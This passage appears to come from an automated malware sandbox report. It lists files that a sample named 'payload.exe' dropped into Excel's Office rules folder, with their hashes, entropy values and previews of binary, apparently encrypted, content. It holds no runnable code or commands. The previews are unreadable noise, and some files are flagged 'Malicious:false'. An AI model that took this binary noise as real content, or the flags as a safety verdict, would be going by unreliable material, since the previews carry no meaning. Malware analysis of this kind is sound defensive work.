                                                                                                                                                                      SHA-256:9D15567F2B59523F43F761CBE409395C70AEC63A2B68533A85A3DBD1E1797C90
                                                                                                                                                                      SHA-512:6C5AD7901352393DAE934D72E872F439D56BC13F07228CC71D5BFD93C797A6A4B22188B0C1B671A8133219A9022712D9C615B3965D5B7DEC5BC818A060FD6665
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml}y...W".;..0..E...}..n.<.|.\.....S%{bt..]....Z7u85D....?..n....A.v....w.^..!.....k..{..S.)...c.`......V%;...........:G..T4.....W.z^....Q.^.gm#.........b...*.\....e...........!.,..k. .b...L./6..`4?...n.+...pF..~..kZ.QJ..4.D.H..)..5......Z..r....Wm..1.PD.N/.8/....I.Q.............s1...6...X...P..Bp... ...T.....F#......Z..l[Cb.L.6.}|.V. ..TI.....9U`.w..u..#...Y.7Q.>#.k..[Y8V...zOE.X.pX................t..6.h...D.._.rv.;{..f.....Ej.V+....Ck_[....5.4.D.`...($!..E.....0......u..d..#~....fw...9..C.7,....j...xX.......l$.G...5gqP@..).y./.d...r.9.N5p.l,...........7D.....V&S....4...]......Pg..4d.......n#e....|..(+..)....s.l(...H1...VJ.L...*3.......9.....%/[(...L/sH.>f.N.Z...<...eV3.1P..$...G.......G..6.....)..>q.{/...1R..n....H<...........L....r{.2.Q...O..:.?,x.=....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320021v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):860
                                                                                                                                                                      Entropy (8bit):7.757224394733499
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:4mEnVI6qfXKjKSdfUxe5J0UV06Xcwj2bD:DEnWvRe/0UV06swQD
                                                                                                                                                                      MD5:63A6082E78E087DD94ED70CAFDCF5DA7
                                                                                                                                                                      SHA1:782AFE080A79EC5709846723E37AB0BC9B69A1C9
                                                                                                                                                                      SHA-256:0AEB47C9FA87F0BE09251861E9637B3DDB8CB6501708A88E3665EA7CB455EC01
                                                                                                                                                                      SHA-512:E23027561015E942B663EDC1A6B31D2667110402115AA42681345009ACFECB7B3EFCF819546AA334457D8626B699410F132FF0DDFE16131E75F25DB5455319D6
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.}.....Z$....M....{(.%...H...p.k..I..V.\....PB.FN\$y.4......kS...@~6,.m.......................$.L...`c...h.n....q...$..'...@.^.....[..P..39..<(..$.....w}3...^^.E........t..<..+...\Y.m.....SY....U...#.[...a..C.+.G.."o|[G...C...I.o...v.+y.l........g...vp..q.k..k.;r...A......]0I../../..H$t...n.......Bq..z..........@.c^..ndlt......3-.B..4.,.Pv[..q.$.Rt...'.....w.&.(...N..R ;Z>.|h.....z0~*..0.....W.N.B,..xP.m.T.'..ysw....]-....2{)eFw....^.ZYW.>?+..3....7.$..Z"...a.f..$.9.P...K...[.G..B...)D....Y..[q....h.o2..$.../......5........=......Z{.h.U......,.l.dyT..f.....5..a.8....[|*.....t_.+..t..;..~..s`J.....B....k...{.......Q;G1.c..r........gi...M....},...m3...q.1A.|R.3..G;7..3i...`..h.........LrF..e.y...%L..5.B...^k.p#...F.Y...:..26.rv.^ .mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320022v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):760
                                                                                                                                                                      Entropy (8bit):7.716877064681863
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:ETJtWMLTTQTd9kzVf9XxIQL4Q30+C0X1hk2pxGlK/717+9SFYPgsSUdNcii9a:IQMkTdgf9XxdpPXD5169oYPe2bD
                                                                                                                                                                      MD5:B418537863943E8664D1834B1D91EE00
                                                                                                                                                                      SHA1:793CEF26DC330F90DA2B669E60C2972DC05A7257
                                                                                                                                                                      SHA-256:F06C9B03D6ADD8AD1B4BB8BE1A121FBCE337F89EF9212CA910EE542301383A5F
                                                                                                                                                                      SHA-512:BD2CE5A4AEAC10AD446C983A8BA0EA00B20B61DAE21C4BB95BD70822759EBBF6C20CD9B8C7C3FF564F6D4DEEEEF9B3BF1CBCFE78F2921B406A4782ED5BDEB9D4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmly.....k.0...>w..I.._!&.&!.,.e...V,*u.j..?!...".c.<.e.u...U..|..&(..f....?z....h....d.T..kB...*S.=.wvo+..4L.a...7..r@.........3.p..........[I...8...d..5|.U..V.%......8~.=..P.....?c&=...U.j..........!....v...9..,p.Qb....`.l..5.'....[../g.l%.....:.$....Y9..+f..'!...|....c..!}.R...4.c-.g....2...\..;.H._.o...\.I\..d^O....$N....D.].0S..B..IZ.2#..1N ..8b..M..G..C;7.y.}.-7...h^FN.....S.^F.j.`.R?.p&S...N~G....u..y...P....a.`M.....@.{.s...c(^..Ay.D.Ru..d..(...(*.D.^.{nB.'...(.UJl..orr....sD..5..l.....~.D.KTg|..*':..a...TP..']..mI.6N.;.3...c9!..`...OL_6.t......)....=..yG..8..Y..OnSV>O9...d:<.KZN..zwK..[.utX|.%..O..5A.S.^.....P~..~."G..F..E.@....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320029v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1117
                                                                                                                                                                      Entropy (8bit):7.808961562375636
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:cMR+Oe5IihJvS48sA8W+AKbbzmexcZEV6Ec4HUoMdU+5KjQqZN+JLdef2bD:hsOeTMLlZ+AKbXeChcfoSeZN8D
                                                                                                                                                                      MD5:A42A6BF380EA64CCA09BA321256906FC
                                                                                                                                                                      SHA1:6EA4589DBC51CB6BF5D80522C8C27C48B39E0DBF
                                                                                                                                                                      SHA-256:8D28BF59CD1046688669902DCB7BD63A00DDC461D290744E8781D9C67DBAA837
                                                                                                                                                                      SHA-512:BFF26D86773B64672BDE8A8177559AB46B858A4ACFAD70AEDB2113EBCFE39F716F5BE060971B717C113B9813E8DBB0176F9567E8E28139D132DEECEECC744F7F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..R...tCpN.>.x..e8.....//.<.`.cL.F2.&..w.\.v.]E.2.q.qJ.\...O_..@r...#.x:.:.o..~.r..M:;...S..M.t..........fy.M~.......`...|m.o.I......2.uvz...c9.=~..}.w3`f....a./..... .d.......%)...,..b..@kS}.....B..T.. 6.........T....'......X...f.......4....E..w..............}I@..*.....h............@y<.2..h...vbF.............T..N.)...(A.HW*...~.6.C9a.......j.p.|.K.........V...V.1>.......%5.%h../..V...~t..=.(.%....T.0]M..OH....7d/..9..>D....t.c.../........g.$..;.aX.(h.J9..m.....a.H..T......l...?....P0,i$W......s.@.1:l.nM.X...Y....N._.......`./X...Vp..p....X..O!..4.xt....h.(D.=.>V........M%....qS9......&.GK...'.@...NN`.Q.q.Q..$...)..-..r.....M.m.0q...R..w.....6Lf_gE..N..f.W....I.."....W...(+.3..j.6..=Zk9...:`]?..v..b..f...4.....n.P9H../.5e|zwB.;.....bp@..DKHD_......J.....vq..U...w_.W.481sITC.~l)/-..13.Zj..R.Z..R...L..I...<.?).+......).\X/9...Pz.x.....-...^&.;m.~E.-.6.R/evD.....;...w..Q.>7..0...T....&_l...Q.-/.b....sz].-.Pj..1...-.}....4.c8.Hgt

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320032v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1025
                                                                                                                                                                      Entropy (8bit):7.807782470635692
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:liIl/USAyiWks1RIu4PYaNWbxQpu7tq9bLiFeBode7v42bD:Blcoijs1RI9PYaNEztq1LiF0oSD
                                                                                                                                                                      MD5:7924C04DC510F8FD8EE07D00C7FDE265
                                                                                                                                                                      SHA1:BFE4D5EDB0C71C618A37FC636D65C0316FBA3FFD
                                                                                                                                                                      SHA-256:CFC1C640C938A4D265098C68209B972AB9E53E4A1F81B6FD7B2FA4FF647610AC
                                                                                                                                                                      SHA-512:69D40E47347E5F1DEB931C2F900A49C519DB48DBB144804308D97A55D7DF601E32D2642A45CCC681D4F32BD06BDA91C8D7A76131DD4E742BD2E3066518C7B63F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml0)=h..p... ..!.}.9@...{`..J.m../r+.....>q...D.........Y...1..:.........'..-...?7...v..N.e...c.>....V..s........cFE....M......6..xi..#/.E..r.7.@.}!HX.*...vp1.?...P....#R...G;.-c.......7&..>.........t......a......F..f...w.(....x..).3.V.t#.....dx..Q.r.N..Q.Y.x2'1...`..........F...Hi..........+_..'%:LM.!...,/o..bt.....&.....o.g'...>....-.}Z&LS+..4...../...O...gR....W..?.,.1.x.....GVm.j...gt.P"8..p...b.#u..\..c.(.Ra.7U?.D6d..R/..,.(E_t..r.P.[.m..|......uX.-.......J..#..F!u...^o.J....YLa.I...>..].A9G91u&.)^C<FD.n.l..S.6.....Pq;.Y.......OU..z1.d..Y..;J.H.j.....lI... ...N.~nd..ez..L.....h,A....T?...yf_.I..j.E..2..fGm.d....;.L.C.x..)Q../..Y.i.T...pu...#.......$.C.1..,^..K.3...%:.........LT@.Ft1.0..X.5_;g^.KI.y#.G..SW.....%.....".8..Q.W..$.T.M:....uH...r....X.........h.p.eW.?...mc...u>.;..i..Vdp...f....,_u..;...ud......t.....z.g..6.s.P%.S..m....X.....~...m.F.\<.."..G.....)q.R.jII}.@.t.NT....).....9.[..=...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320033v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1112
                                                                                                                                                                      Entropy (8bit):7.810765715318993
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:5wNFQFXcRTRKj+btxLgdAFvmRwkhXAvMSviUNLikEnfyYTm52bD:5wNFwaTRKj+btxEiuwoXAvFvGkky0mSD
                                                                                                                                                                      MD5:8A04CE0398D67D494ACC41C7C26D7DD3
                                                                                                                                                                      SHA1:B3266E85B4171F662728D84E4BECB243983693DA
                                                                                                                                                                      SHA-256:EBBE0EE5F29998F8CC7FE1639C751DE84633449F5C076102A84B505B72CC999E
                                                                                                                                                                      SHA-512:97A5B3800F148D81D9C8F70F1A1994804F8486727422CB6851A11784A905575D9804C0E7BABD99D0FD099F9FC288603CC49AD56DEF92DD608D0CDCBFEF48BA6E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..-.x3....h}.p.n.f.Z..x_...u.[[K0....\.:.X...}Ip..]^.D...c..Bc."J_z.....1..)`...WU.........dUj..vKlm.r......dqk.;.....q..W.E..f.,..;BVP.<o.+=.f...:.b..-..2.k].oQC...J.&$....S.J....$rB&.r1.K.~U..U..Y..A.3.#$..i}(....m.......p..7..7.I*....r..#.f.4}6.....q.LU9C...l...tm..c.r....T............b.84....c.)|.2..S.[M.s..[.3c...#^....q.U.Q...-..'.0..?..3..B./V.Y.w'..j.8..u..a0%.....;O....Yz..k.....6\..g.L.aN...P73.k.v8xB..F~...O.....l(.`J4GP.M.d.>.,_...2".../..e......U......).p......$>-?..RF.N<..Y....'......MX..j.=.&\..Dt.>B[.e..f...z.....%..V.S.c..4...........T..d.......]Y=.z......7..@.....K..[)M.G%...................%.wx..<.p......f.3P5...Tru."j.MN....s...S...1...7.9.=Gj..B/.qO30..FY..:..{..!.e.......v.....:n.. ...r#.u.,...Ez..c..%o....6..3.z...{+A...v..9...}.$...}U...+O.K]e.P".'v.AZ......l'.....&u.#...i..2....-..,ir.<P5.....j[d.AvT.u...h5.....mz.e.nN...q-...|.$N.j.O4.....D9.....I.%..bTre*..=J..,#.!+...-.R..2f.7..W.,...;G...V8<X*p..p.. 1...=..$

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320034v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):923
                                                                                                                                                                      Entropy (8bit):7.773862576827254
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:CjPqQwxxxK62KHFIzZkIpODyA+lJuuUaAqpbVww0gJ0ANPe8Ov1xgHf+bxsGEFSw:F862GikIIDX80Mwvt6mbGGp2bD
                                                                                                                                                                      MD5:4FDBDD18922983F200CB8B88A095DAB0
                                                                                                                                                                      SHA1:B74C7531FA345FE9E9070FEF3711EE38CC0699B5
                                                                                                                                                                      SHA-256:4B5342E1F0A7D0D623F8572ABE3F4173323AE10E6DBFA8DD06A09BEABC86A0F5
                                                                                                                                                                      SHA-512:BC7B4CD340D63D0AC3A6DAACED9313D0C62063544156AFD98BAAF148F4EA4BC70499891ADED10ED0CC607503C41390BEA6D3D11B5613FA890A466B7F817BEFE4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...nq...d].`...v.+.....=.~E...<.....}....x...,.S..+...bg. `.t..............E.nE...1.-<..o...H.:uK...].C.:.)p./.....\#B.. .h.y..T.....cmK.X'.0..&.*T.o.....8.m.Q.5...n.).FLQ...QOf..<..?u..7.:|...3$..k.T....I....K..x..V........#]......A.U[z.O....sq.|.{qd.z{...oS.....r..`..Z..&+c....!.qL?.x6....oG.f...^.6.D..p..Q.*0\.'..j>v.h@..y..{..X.......]...=...y`wP....m4.Q..Fe..{.M.0.S.Bc-0.z.L.Y.V...r.v.N...?.2..[O4G1."...\.`..P....).[.....9}I0.......h.&.o^.1$N....R.....{8B.....0..<1KB5r..h. ..R.4.9...).(bT.)"..+.....s..N........S....T.CJ.>.R..k......YXy...~7.....r:..<iIP....`...B{hb&.k^.{.vvk$..S.1-......q.7.02.Rd.bz.='..B...y..V.a.c...d..S...J..tz.[]..p.......q...4._.&...ZBJ..W...|U8...H.,.C.."..v[..sz....N`.R..Y.... j.....3;.......Y....;t.,........RbH{....|....o...X..Ja?......4.A...m`...`.......#mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320035v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1413
                                                                                                                                                                      Entropy (8bit):7.876027389172971
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:LO4giq9PghZ0zxZUsQNuA6TGfWxWc7AbQqwLWGcC2BZItBlWJF/8DqUrxGn42bD:iUq9Yv+z1QoA6ThAQ0C2Azl8CqvrD
                                                                                                                                                                      MD5:14F26D5834E11F26430E522762855456
                                                                                                                                                                      SHA1:0272D62678541E8CBF9A2D23591872BDC263B50D
                                                                                                                                                                      SHA-256:F6867F70FABBDC2F0D12582396BA054E3F1B836DEEF86046B0842C82AC4DB28C
                                                                                                                                                                      SHA-512:E743520D2416907CE2FCD833E4C314C6ACAC915C192542856319B4725641A10943CBEFCF1D97948FAF4324083C1C7F0CF26E1E066A4DD78C493A75202A6DA9A1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.d....".l.j#....T.[:4?........f.).3*.M....p.....QlHu.a..WtfL.X>.b.5.L..1...2I.....EV.....a...nr...7..:N.c..&.)..U...T.+t|...q0P.(..E.)....=+U~......k.U..o.@.y.u.5......o..|..vFY./B......L...l.l.G..:C'..K=#F..u1.%G.....}..=.....p."S8.L%..EK......I.!.1.....H.s...cl@....-...;..He`..z.....#..2.......I..H<...nrC^'$....x..Ab=.}..!2...C.P.3.l....Z$T.q.J....a.....L_PW......n..".Q.B........:Jn..j$...a..a3.m%.{..x.....$...S~..Jt..c.p.Oz..b.. &....O.....Y.p`...s<....<.dW..`Wn.......*.,...4......."#....Pm.R...a.O[.8.P...H.b....JdzH.'"Y.G..2.<.Ul. ./rCdR...!.b........0...Ar.."......7M..15....n.h.d.(.4.....Z..l.....9...xa....._...^.&...F..jKw.q.Q..,z..E.~........r]J.R...a2.-K...<65.+...q..N.q.|3...Q.Q.....5.....S.b|....,..oUY..V.....t.....h5".t...Q?X.*.^..H... L.sL!..3.....s..g.....S.w....'..)r.k..K..?./.....h.C.,...m..{`v7.&.zgXw$.cm...D.P..M?#C..A^L....~.....G.<.[*.Pv.R.#>..7....Z.`......&Tt;d....yx....0......$....7.....T.v..*.."C.4.d.}..1....)...f.fH.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule322001v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1000
                                                                                                                                                                      Entropy (8bit):7.792654441304339
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:8PMRgKioqeYFS7k83RprP2jrmkv//JKzffKw0RfpQq+Hcm6vchrL8v6gOFEM0fSw:8PpFhg/rPbkH/4ftEfpx+8m6vdi52bD
                                                                                                                                                                      MD5:E0C3102CC023822E4A0A216962E86932
                                                                                                                                                                      SHA1:2FD5C6EE8784222DD75B396FE9A684749FD21227
                                                                                                                                                                      SHA-256:2C68549B1BA8ED0FBC268846E5DEB22932F7875AD18FC4DE40A3AFD23A2BCCA5
                                                                                                                                                                      SHA-512:A8556705205976F91ECB292A254C217B6E7653548F5E3F8D5C830455FCC70B2653E1E7D9ADC9D8E5F0CA4E3828C316AE1DEA0F61CB69AF52432489BFD2905AF8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..eME..RA.N..LE..5..a..zO..-..bx.J.M.ZzL>".4....;>%..HD..E._..............Rf.~..,..|...c[...b8.+.U.M.3}.,K.}_e.......iy.5%i..A...>Q..EZ.....w]V$(y..e3-.{...ON..=...7.s...kJ... r..B,.E3.....q...V.}...^..._]z.~a...]...?M}....p...#?1.....@.......%{i.A.q..l`.{.V_.=H.p.n_,.j......:a.e.,qbf.$.a.yI'...;.G...,.a#..\...i[..G.a..AXfd.z9.0.f.t_......A).EF^..}....p..../.04V.w...>R..S7.u..UsGk..K7.T.N.(/...v.....K....Y.N}.|..E..-!.@......sWB@}.....t.#..C.4v.@3H.-;(p%p.)..Wy.a.W...z.....x.B.....+.6p0c.sCj.yS30)......... yEQ..S....._...R.....-..Du.x.i... ....}.>~2N.e.oV.H.D..C.aR....g..[1u....&..>.~...Cr..-..6^..L+......;[......_.{=.Jcc.&.........w9s..u./.A..4m.0.W_.U..h.....g.\&..Y*....v.H&.s~;..<...Pkg(b...r.E..R.0...V..=6e6t.....y..Q..;.......!....F....1.....@]J...X+-y..k.@@>D.o.....M].&pk..?.....q{..gM.[.~..rLn'#y......$C..6.8.P.~...h..<...[...7...X..P.....N'L..._.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule322004v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1133
                                                                                                                                                                      Entropy (8bit):7.800688964017194
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:F66gVs0iCjvtdBfTVh73fDeLos6Q+MSI6lK/sV91iodl2bD:F66YBvtdBbLquMShlK0VXi++D
                                                                                                                                                                      MD5:EA35E8209E1BE02D44C746C8BC8C3FB8
                                                                                                                                                                      SHA1:D9EB7FBB23A2A9695BB2355C711AF0E8F1B1194E
                                                                                                                                                                      SHA-256:565D7499EDAAFEB42E802A11240CDBF58F3A556DE2CB611DA5A5387CE17428BA
                                                                                                                                                                      SHA-512:D561DBFAE8A4AC5D94DBD397E4E1DB83293F54D458800FC1E851F04190393CB43A438F6D1A0260D60737C43B5672FA275BD0D316FB35ADBB35A8D62E00461526
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..bm....h..64....}K5.b..M.'..*..!./.7......5.G-...9..r..|..O2......&dK....c.i.|...~.-D.`.L..T@8n...m<...c.1......-..`1)..3.[.ux........4P*....h8.}.Z....6.s.S.....LT...>.Q..e.!.N.U....v..*.j.......z.......!^...b.^E.....A.Iv....c.3...... .w3K.{...v.t..o3.-!|.*.b.N.J.h7.b4./xR.".Q......<..l...D.c4..(Sp..Z...@#......r..`....z.dW..V.......v.<].9.............c. ....k.)..y......O.3......K..x..O..m..S......_....l;..>.......y.....1.O........r.6.u...h.Y-..s\.z.F..7..v;....T....z...Xc. ..c.GK.@hc...K.....s;...'h.E.~....|......n.q.`..8...YyMc.3l.,@.rf......S;.....4l1.W.D`.......#.mj.l...c..T.|.....>..\v-...$..f.....E"T;....O.PAA.............+....-.Stu....-..~|r+>.U.H.&4).f..<.).m0....^.i9.W..T....2ie9.....a..M...5.rL}Z./.9...-.....@].!.{..j..1.f..]{iwn......,4m.S.........z...9g8f.'......B...c9.ySB<....;1t.&1....o..Dw..R[......D.$&w.........S..rT~.4..*WL..;:..{ ..R.*....g ..9..ChZ..&P...;.Z...#....8..U.j .#Q39B(r8.;`.O....Y.!.u9.....a.[2..]...Rv

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule322006v5.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1692
                                                                                                                                                                      Entropy (8bit):7.885514539172888
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:gVbKV8E15UEX1sgabOLi6TmUiFnPdlqk782plYDD:sQL5U+qgagmUEnPzzg
                                                                                                                                                                      MD5:0B8F15B17106F76A8D010602A2617069
                                                                                                                                                                      SHA1:64FA726927FE7991B2F71CECAAE9473AFE087728
                                                                                                                                                                      SHA-256:B5C7B405093FBFC73C6B2FD6A8B8731AF7618A508FEFC5185189382D128FDC79
                                                                                                                                                                      SHA-512:826E491F0325D38544EC580A44A7149B7BD13EB6E48C2A47B6186C7D2C2320736FC6FB9204BE41970BD522DF2BC45C34327FB3F2BEDE4CA8EC3834CAD55BC097
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...k.(.<.,...2....}..........l.p`....Q1.n..,NF......j........0]...."..`u-.".&..-...6!.W.U.P.L....J.V.4..!L....@.......7F...v.P.-...|7.Gz.r..t...e..t.$...e}+.......w....o.|...v.x...._;..o.........rHv..@(^.".j..N[.3d.:..`....R.....J=T......A.e....O..M...\.p.y.-.q..0.~.[ o~,....k.......',..}b...6.kY?+.._..?p.....Mr:Y...4.."..x.4........a....S..);....e.......%.-R..Uo...e..H%DU..])`.G..P&..g......A+....7./Lh.j..|1.....0.......3.......]LG....9..e.7.......[.mac.G.<Pq..rg.P...=._8...P.vb....Di.C....u....n.$.<su.J..`.).J.x..... +.%...x..`K.F........p.D.sx.6.......\..6p.m..O\......^.F.^Er.Th....Rt..`.t.....*Em.C.y...."..h%_...._...O....~^....q..D..w../..X.N.Q.lu..Qoe..[..4..}.9.-.......;RpQ0$. ...m...xM...ZI.-.PT...I..*9.. &P..lPf.Z}5.V.w.. y.....|.1.B..4.............k...>.gru....6m...;x.......S:PtB...O......b..;....L.........0L..*.....h...,.S.sj+dt.+...>.2...."&..29.7...&}...Q.=.....n......fu.4.^'`....V...V.np.....X..,...xlz&I.f..b..K..DOO..m...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324001v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):846
                                                                                                                                                                      Entropy (8bit):7.717078983200737
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:S6PmdNAIjRhNn4+FZOgts5RMIdnfwQDr2bD:S6edNNhNfhQsD
                                                                                                                                                                      MD5:53DAC0854CB7F32CA058F5953BE97478
                                                                                                                                                                      SHA1:16FC28E3FBF99BB237878EDA1ED67DDE9A225AB1
                                                                                                                                                                      SHA-256:C9CC8E855FDB91A8CEE179E7916E28DBFC83DF84A0EDBB4E6F919EC6EE9E9631
                                                                                                                                                                      SHA-512:7F42DBD28C5034950D537D068C110EFE9FB83F6EB473F056F64CCE83F781978E92FAC57875795DC5824FF2169D50A9F750C7F4A5DF73876A110F25504464C2B3
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmly.u..H..Ue..v5.9<..x.#..x.{1RT..3......G.g.<!...1*G.8..~B.K/1.Y..u.Y.1.....?U.?{8..[..T....1..s...xX..%x...<...fO.z.6.....w.....*.....&.DA..w.g.h.....o64.\...+.R.~aa.!..h.}.q.m.u..*..`L........q.4DP......rB.B.}..R..7...$......8..L....[..z/........3......(@Qa.....`......A/=..g0.or..mSk.}L]$..n-3...G...;.c....Y..d....q.3~..>.....-.........a..j...P......7..n\B....C.4U.-.101.g.C....3n.h.g..b.v'H...!..>.>.-.P.hkh..U5..),. %I....)Q/...}.o'x.........]..2-a..z. ..b=!...H..@....*k.E...4.u._.j.z......B.v..?\O.p<.o.o>.+|2.6.....m..........e.h:f..g...N....L..{....6 ....7L..p.r....u..).T....I....Q.{@+.S.....Me..X.i......QT..."5d.oJ.+.5.....gYh.~...Fp...."K..g.v.A..`&i}.......fY8.....\......^.y9..:<E..Y.....M.o.\(...Y.K.q9y.qmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324002v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1197
                                                                                                                                                                      Entropy (8bit):7.842288992229559
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:hSRLqLFWVMZniU12PTYJP0Ms+9VPs1RlNyHCZfZTI2bD:hILqs82g0MsaIRlnZfV7D
                                                                                                                                                                      MD5:38ECEAF905B0B0B79913C49E6B4F3198
                                                                                                                                                                      SHA1:30766FD61A7CAB59A6345C9CBFF1296C2D5A9F0F
                                                                                                                                                                      SHA-256:8503990415AA069832F02BEE676A8A80C0BF2E7E7B172B514C3C1E98FF1C8608
                                                                                                                                                                      SHA-512:5A7F96F6D974CD42F1D49C38B55F3519ABD195C5F1D2B8338B66125FDFF5B49322B9219DAF81D36AF8CA22C18214DA51DD4904DF6C28CE93519A1D03E8118453
                                                                                                                                                                      Malicious:false
